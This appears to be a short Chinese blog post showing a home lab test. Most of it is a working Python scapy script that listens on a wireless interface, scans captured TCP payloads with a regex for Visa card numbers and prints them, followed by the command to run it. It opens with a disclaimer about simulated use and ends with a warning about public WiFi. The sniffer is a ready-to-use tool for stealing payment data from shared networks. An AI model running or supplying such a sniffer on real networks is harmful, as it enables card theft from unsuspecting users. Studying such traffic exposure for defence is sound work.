0x0
声明:本次的测试只是在模拟环境下进行,请不要在现实环境下进行,如果在模仿本文触犯相关法律与本人无关。
附上脚本:
import re
import optparse
from scapy.all import *
def findCreditCard(pkt):
raw = pkt.sprintf('%Raw.load%')
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?',raw)
if visaRE:
print '[+]founde visa card:' + visaRE[0]
def main():
parser = optparse.OptionParser('usage % prog -i<interfafce>')
parser.add_option('-i', dest = 'interface', type = 'string', \
help='specify interface to listen on')
(options,args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*]starting credit card sniffer'
sniff(filter='tcp',prn=findCreditCard,store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == "__main__":
main()
运行该脚本:python testCard.py -i wlan0
wlan0是我的无线网卡,并且虚拟机是通过无线网卡截取信息。
接入无线设备是wlan0
检测到网页上填写的假的信用卡卡号
EOF:
这个实验表明,通过抓取无线网卡的tcp流量可以通过python正则表达式展现客户端输入的信息,这就说明为啥我们不能随意在公共场所接入免费WIFI,因为你的操作很可能被人listen on!!!!